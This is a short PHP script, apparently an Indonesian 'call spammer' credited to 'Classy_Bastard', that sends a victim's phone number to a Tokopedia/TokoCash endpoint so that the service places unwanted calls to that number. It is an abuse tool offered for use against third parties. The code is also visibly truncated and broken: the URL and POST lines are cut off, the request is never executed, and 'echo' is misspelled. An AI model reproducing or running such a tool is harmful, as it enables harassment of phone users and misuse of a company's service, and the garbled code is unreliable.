<?php
// Limit 3x Telpon Setiap Satu Nomor
function send($phone){
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "https://www.tokocash.com      >
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_HEADER, true);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, "msisdn=$phone&acc      >
        curl_close($ch);
                echo $asw."\n";
}
echo "
>>>>>>>>>>**********Classy_Bastard**********>>>>>>>>>>
    Spammer Call From TOKOPEDIA
    Mod By      : Classy_Bastard
    Contact Me  : classybsd@gmail.com
    Blog        : www.classybsd.blogspot.com
    Instagram   : clasyy_bastard
    Thanks to   : Classy Bastard
    Penggunaan  : Awali Dengan Angka [62]
>>>>>>>>>>**********Classy_Bastard**********>>>>>>>>>>\n";
cho "Nomor\nInput : ";
$nomor = trim(fgets(STDIN));
$execute = send($nomor);
print $execute;
?>
